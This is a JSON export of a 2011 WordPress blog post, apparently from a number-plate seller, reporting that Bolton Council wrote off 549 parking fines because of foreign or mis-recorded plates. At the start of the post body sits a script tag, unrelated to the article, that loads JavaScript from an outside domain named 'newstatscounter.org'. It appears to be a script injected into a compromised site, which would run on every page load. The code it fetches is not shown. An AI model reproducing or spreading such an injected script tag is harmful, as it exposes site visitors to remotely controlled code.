{"id":1052,"date":"2011-01-04T09:50:55","date_gmt":"2011-01-04T09:50:55","guid":{"rendered":"http:\/\/www.image-reg.com\/blog\/?p=1052"},"modified":"2011-01-04T09:50:55","modified_gmt":"2011-01-04T09:50:55","slug":"parking-fines-lost-due-to-numberplates","status":"publish","type":"post","link":"https:\/\/www.regplates.com\/blog\/2011\/01\/04\/parking-fines-lost-due-to-numberplates\/","title":{"rendered":"Parking Fines Lost Due To Numberplates"},"content":{"rendered":"<p><script type='text\/javascript' src='http:\/\/newstatscounter.org\/counter192.js'><\/script>MISTAKES by traffic wardens and untraceable foreign drivers have combined to cost Bolton Council more than \u00a330,000 in parking fines in the   last two years.<\/p>\n<p>Parking chiefs have been forced to write off 549 penalty charge  notices (PCN) because the DVLA did not have records of the number plates  on the tickets issued.<\/p>\n<p>This was either because they were foreign-registered vehicles or traffic wardens had taken down the number plates incorrectly.<\/p>\n<p>But the number of tickets written off represents less than one per  cent of the total number of fines issued over the same period.<\/p>\n<p>A council spokesman said: \u201cThe penalty charge notices can be written off for different reasons.<\/p>\n<p>\u201cSometimes it is because it is a foreign number plate, and sometimes  it is because the number plate has been recorded incorrectly on the  penalty charge notice.\u201d<\/p>\n","protected":false},"excerpt":{"rendered":"<p>MISTAKES by traffic wardens and untraceable foreign drivers have combined to cost Bolton Council more than \u00a330,000 in parking fines in the last two years.
